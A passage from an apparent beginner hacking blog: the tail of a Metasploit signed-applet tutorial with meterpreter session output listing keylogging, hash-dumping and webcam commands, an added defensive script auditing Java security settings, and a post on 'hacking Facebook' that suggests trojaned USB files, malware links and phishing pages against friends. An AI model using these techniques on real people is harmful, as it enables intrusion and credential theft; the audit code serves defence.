Now, finally, I refreshed the URL, accepted the warning and allowed the applet to run. I got a new session on Metasploit. The sweet smell of success was highly diluted by the fact that we really rigged the game in our favour. In a real life scenario, you can't expect the AV to be disabled and the security settings set to anything other than the default value.
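The last paragraph makes the defender's point: the attack only worked once the Java security slider had been lowered from its default. Here is an added example (my code, not from the original post or from Oracle) that turns that point into a check an administrator can run: it parses a Java deployment.properties file and reports whether the security slider has been lowered below HIGH and whether it has been locked against the user changing it. It assumes the Control Panel slider is stored as the `deployment.security.level` key with the values MEDIUM, HIGH and VERY_HIGH the post lists, and that a key is pinned by adding a `.locked` entry for it; the three sample file contents are constructed for the demonstration.

```python
"""Audit a Java deployment.properties file for a lowered applet security level.

Added example, not code from the original post. Assumptions: the Java Control
Panel security slider is persisted as the `deployment.security.level` key
(MEDIUM / HIGH / VERY_HIGH, HIGH being the default the post describes) and a
key can be pinned by adding `<key>.locked` to the same file.
"""
from typing import Dict, List

# Slider positions discussed in the post. Below HIGH the sandbox restrictions
# that stop an unsigned applet from doing much are switched off.
LEVEL_RANK = {"LOW": 0, "MEDIUM": 1, "HIGH": 2, "VERY_HIGH": 3}
MINIMUM_ACCEPTABLE = "HIGH"
LEVEL_KEY = "deployment.security.level"


def parse_properties(text: str) -> Dict[str, str]:
    """Parse the java.util.Properties subset used by deployment.properties.

    Handles '#' / '!' comments, '=' or ':' separators, keys without a value
    (used for the .locked entries) and backslash line continuations.
    """
    props: Dict[str, str] = {}
    pending = ""
    for raw in text.splitlines():
        line = pending + raw.strip()
        pending = ""
        if not line or line.startswith(("#", "!")):
            continue
        if line.endswith("\\"):          # value continues on the next line
            pending = line[:-1]
            continue
        for sep in ("=", ":"):
            if sep in line:
                key, _, value = line.partition(sep)
                props[key.strip()] = value.strip()
                break
        else:
            props[line] = ""             # bare key, e.g. a .locked marker
    return props


def audit(text: str) -> List[str]:
    """Return a list of findings; an empty list means the file passes."""
    props = parse_properties(text)
    findings: List[str] = []
    # Absent key means the default slider position, which the post says is HIGH.
    level = props.get(LEVEL_KEY, MINIMUM_ACCEPTABLE).upper()
    if level not in LEVEL_RANK:
        findings.append(f"{LEVEL_KEY} has unrecognised value {level!r}")
    elif LEVEL_RANK[level] < LEVEL_RANK[MINIMUM_ACCEPTABLE]:
        findings.append(
            f"{LEVEL_KEY} is {level}: the sandbox restrictions on unsigned "
            f"applets are disabled below {MINIMUM_ACCEPTABLE}"
        )
    if f"{LEVEL_KEY}.locked" not in props:
        findings.append(
            f"{LEVEL_KEY} is not locked: a user can lower it from the Java Control Panel"
        )
    return findings


# Constructed sample files, not copies of any real system's configuration.
SAMPLE_WEAKENED = """\
# Java Deployment Properties (constructed sample)
deployment.version=7.21
deployment.security.level=MEDIUM
"""

SAMPLE_HARDENED = """\
deployment.security.level=VERY_HIGH
deployment.security.level.locked
"""

SAMPLE_DEFAULT = """\
# slider never touched, so the key is absent and the default (HIGH) applies
deployment.version=7.21
"""

if __name__ == "__main__":
    for name, sample in (("weakened", SAMPLE_WEAKENED),
                         ("hardened", SAMPLE_HARDENED),
                         ("default", SAMPLE_DEFAULT)):
        print(f"[{name}]")
        for finding in audit(sample) or ["OK"]:
            print("  -", finding)
```

Pointing `audit()` at the real file from each user profile gives a quick way to spot machines where someone has done what the post did on purpose: moved the slider to medium and left it unlocked.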

Use the following commands to switch to the created sessions:
msf  exploit(java_signed_applet) > sessions

Active sessions
===============

  Id  Type                   Information     Connection
  --  ----                   -----------     ----------
  1   meterpreter x86/win32  Home\Me @ HOME  192.168.154.134:4444 -> 192.168.154.1:49682 (192.168.154.1)

msf  exploit(java_signed_applet) > sessions -h
Usage: sessions [options]

Active session manipulation and interaction.

OPTIONS:

    -K        Terminate all sessions
    -c <opt>  Run a command on the session given with -i, or all
    -d <opt>  Detach an interactive session
    -h        Help banner
    -i <opt>  Interact with the supplied session ID
    -k <opt>  Terminate session
    -l        List all active sessions
    -q        Quiet mode
    -r        Reset the ring buffer for the session given with -i, or all
    -s <opt>  Run a script on the session given with -i, or all
    -u <opt>  Upgrade a win32 shell to a meterpreter session
    -v        List verbose fields

msf  exploit(java_signed_applet) > sessions -i 1
[*] Starting interaction with 1...

meterpreter > 

From here, all the meterpreter functionality is available. Here is the list you get by typing help at the meterpreter prompt.
meterpreter > help

Core Commands
=============
    Command                   Description
    -------                   -----------
    ?                         Help menu
    background                Backgrounds the current session
    bgkill                    Kills a background meterpreter script
    bglist                    Lists running background scripts
    bgrun                     Executes a meterpreter script as a background thread
    channel                   Displays information about active channels
    close                     Closes a channel
    disable_unicode_encoding  Disables encoding of unicode strings
    enable_unicode_encoding   Enables encoding of unicode strings
    exit                      Terminate the meterpreter session
    help                      Help menu
    info                      Displays information about a Post module
    interact                  Interacts with a channel
    irb                       Drop into irb scripting mode
    load                      Load one or more meterpreter extensions
    migrate                   Migrate the server to another process
    quit                      Terminate the meterpreter session
    read                      Reads data from a channel
    resource                  Run the commands stored in a file
    run                       Executes a meterpreter script or Post module
    use                       Deprecated alias for 'load'
    write                     Writes data to a channel

Stdapi: File system Commands
============================
    Command       Description
    -------       -----------
    cat           Read the contents of a file to the screen
    cd            Change directory
    download      Download a file or directory
    edit          Edit a file
    getlwd        Print local working directory
    getwd         Print working directory
    lcd           Change local working directory
    lpwd          Print local working directory
    ls            List files
    mkdir         Make directory
    pwd           Print working directory
    rm            Delete the specified file
    rmdir         Remove directory
    search        Search for files
    upload        Upload a file or directory

Stdapi: Networking Commands
===========================
    Command       Description
    -------       -----------
    arp           Display the host ARP cache
    ifconfig      Display interfaces
    ipconfig      Display interfaces
    netstat       Display the network connections
    portfwd       Forward a local port to a remote service
    route         View and modify the routing table

Stdapi: System Commands
=======================
    Command       Description
    -------       -----------
    clearev       Clear the event log
    drop_token    Relinquishes any active impersonation token.
    execute       Execute a command
    getpid        Get the current process identifier
    getprivs      Attempt to enable all privileges available to the current process
    getuid        Get the user that the server is running as
    kill          Terminate a process
    ps            List running processes
    reboot        Reboots the remote computer
    reg           Modify and interact with the remote registry
    rev2self      Calls RevertToSelf() on the remote machine
    shell         Drop into a system command shell
    shutdown      Shuts down the remote computer
    steal_token   Attempts to steal an impersonation token from the target process
    suspend       Suspends or resumes a list of processes
    sysinfo       Gets information about the remote system, such as OS

Stdapi: User interface Commands
===============================
    Command        Description
    -------        -----------
    enumdesktops   List all accessible desktops and window stations
    getdesktop     Get the current meterpreter desktop
    idletime       Returns the number of seconds the remote user has been idle
    keyscan_dump   Dump the keystroke buffer
    keyscan_start  Start capturing keystrokes
    keyscan_stop   Stop capturing keystrokes
    screenshot     Grab a screenshot of the interactive desktop
    setdesktop     Change the meterpreters current desktop
    uictl          Control some of the user interface components

Stdapi: Webcam Commands
=======================
    Command       Description
    -------       -----------
    record_mic    Record audio from the default microphone for X seconds
    webcam_list   List webcams
    webcam_snap   Take a snapshot from the specified webcam

Priv: Elevate Commands
======================
    Command       Description
    -------       -----------
    getsystem     Attempt to elevate your privilege to that of local system.

Priv: Password database Commands
================================
    Command       Description
    -------       -----------
    hashdump      Dumps the contents of the SAM database

Priv: Timestomp Commands
========================
    Command       Description
    -------       -----------
    timestomp     Manipulate file MACE attributes

Conclusion

If you've followed along so far, you might be feeling disappointed. While the feeling is natural, it is quite unnecessary. A better way to look at it is as the first step in real-world pentesting. All this while we were dealing with non-existent scenarios: old, unpatched grandma's Windows XP machines. These don't exist in the real world. In reality we have to deal with strong defenses, limited rights, antiviruses, firewalls, etc. Soon you'll be writing your own exploits (okay, not that soon), and evading firewalls and antiviruses (what we did here is not called evasion; you can't simply turn off antivirus protection like that, as you don't have access to the computer). In the next few tutorials we'll see how to get around all the things we did and shouldn't have done (disabling AV and reducing the Java protection level). There are things that can't be avoided (the target has to go to a URL containing the applet and allow it to run), but we will try to make things as real-world as possible. We will also move to some non-traditional exploits, as their AV detection rate is much lower. We will look into encryption and anti-virus evasion in detail. A lot of things need to be done. Just remember, you are in hand-to-hand combat with one of the most secure systems you'll come across, and it's not gonna be easy.

Monday, 26 May 2014

Hack Facebook Account : Stuff You Should Know


Hack Facebook?

Okay, so you got lured into the idea of hacking a Facebook account? I won't ask why. Everyone has their reasons. If you came here to learn how to hack a Facebook account, feel free to leave, because the title read "Hack Facebook Account : Stuff You Should Know" and not "How to hack a Facebook account" (well, actually don't leave, I have something for you later in this tutorial, something on actually hacking Facebook). That being said, there are a lot of real hacking tutorials around the website you might want to read. However, if you are here on a pure curiosity basis, then read on, and you will be a smarter person by the end of this post than you were when you began reading it.

Why not to think about hacking facebook

Search Google Images for "facebook hack" and you already see so many misleading programs. I mean, just enter the user ID and they'll provide you with the username and password. It's surprising how many people actually expect it to work.

First, because you can't. Well, actually you can, but the high improbability of success makes it stand next to impossible, so much so that I won't be exaggerating in saying that it can't be hacked. If you think typing 'hack facebook account' on Google, clicking on the first result, and entering the target's email address will give you the password of his/her Facebook account, then you are not on the general level of stupidity, you have achieved an appreciatively high one. Come on, if it were so easy to hack an FB account no one would be using FB to start with. There is so much on our Facebook account that we can't even imagine the consequences if it were to get into the hands of a seasoned hacker, leave alone a novice (not even a novice for that matter) who just searched Google for hacking Facebook.
As far as the picture on the left (captioned "you can't hack facebook") is concerned, it's one of the many tools offered on the internet, all of which have the following in common-
  1. All have very easy user interface. You just have to enter the user id, and click hack.
  2. All have download links which will take you to a survey, or some annoying ads.
  3. All are 100% not working.


What does 'hacking Facebook' actually mean?

What is the actual meaning of hacking Facebook? Most of us are misguided by the term hacking in general. Hacking incorporates the attainment of someone's password, but hacking is so much more. Account passwords are to hacking what coins are to the Subway Surfers game. You get coins along the way, your progress is partially judged on the basis of coins acquired, but the idea is to find your way through the obstacles and keep moving ahead. In a general sense, when you use the term hacking Facebook, you mean to understand the functioning of the website, find out about its database management systems, scripts employed, use of cookies, the language it is built on, etc. Then you find vulnerabilities in the working of the website, and code exploits to break through the obstacles and gain privileges into their systems, using suitable payloads. The next step would be privilege escalation. For example, you found out a vulnerability that allows you to look into the database and see the email address and cellphone number of any user. You would want to escalate your privileges and also gain access to their passwords. The last step may be setting up a backdoor, for quicker access next time. Another step might be to clear your traces so that you don't get caught. And trust me, you can't do this. I mean, you wouldn't be reading a blog on beginner-level hacking on Kali Linux if you had come that far with web pentesting. So, the conclusion is that hacking Facebook is a real big deal, not everyone's piece of cake (I admit even I'm nowhere close to the level of expertise where I would be playing with databases on Facebook servers). And the Facebook passwords are just a reward that you get after hacking Facebook. But are we missing something? There can't be only one way to get someone's Facebook password. I mean, we don't want administrator access to all the Facebook databases, just the password of one of the millions of users. There must be a hole somewhere.
That kid next door claims he can get the Facebook password of anyone, and he's good, but not 'code an exploit for Facebook' good, no, not that good. This is where social engineering steps in.

Social Engineering

With time, the level of security in all fields of life keeps getting stronger. The element of encryption has reached an almost unbeatable stage. With 256-bit encryption, cracking will take practically forever. The element of laziness is in our favor (not everyone upgrades to the latest security measures), and so is the element of cost-effectiveness and carelessness (you don't picture a nerd kid with glasses next door when you are deciding between WEP and WPA for your password). Nevertheless, things are changing, but one thing remains constant: humans. Humans in general are stupid. Not really; a better word would be ignorant, not aware of how stuff works. Most Facebook users have no idea about everything Facebook is doing for their account's security, and how easily their carelessness can ruin each and every one of Facebook's efforts to protect their private information.

Humans are the weakest link in any security system

From leaving one's account logged in to not paying attention to someone who's peeping from behind, watching them type their passwords, humans can be really ignorant. But we need not rely on this level of ignorance for passwords (I stopped using the word stupid because it'll definitely annoy and offend people. I mean, not good at computers doesn't really mean stupid. They have other stuff to do than protect their accounts). We can very well get the password of an average internet user who is not very paranoid and cynical about stuff. We can't hack Facebook and gain access to their servers, but your friend's machine isn't that well guarded. A virus bound with a game he asked you to fetch on a USB drive? An average person won't think that you might have planted a trojan or a keylogger on the USB drive when he takes a file from you. Or maybe send him a link which will silently install some malware on his computer. Many people don't think twice before clicking on a link (some people do, though). Or maybe make a fake login page and send him a professional-looking email, directing him to a website where he ends up receiving a login page somehow (you have to make it look real and genuine, backed up by a nice story that you can expect the target to buy). There are many more methods. As far as the promise of something later in this tutorial about actual Facebook hacking goes, I have provided you with a small trailer about what you can do; in the next few tutorials we will discuss stuff in detail. The first tutorial is here.


Credential Harvester To Hack Facebook (Phishing)


I don't usually put this disclaimer, but as it was a tutorial that could potentially lead a lot of people on the wrong track (away from the quest for knowledge and towards the quest for illegal hacking and account passwords), here is a warning. Everything on this site is for educational purposes and I won't be responsible for anything you do with this information. If you do something illegal, the jail time would be yours to serve, not mine. So be careful where you are headed.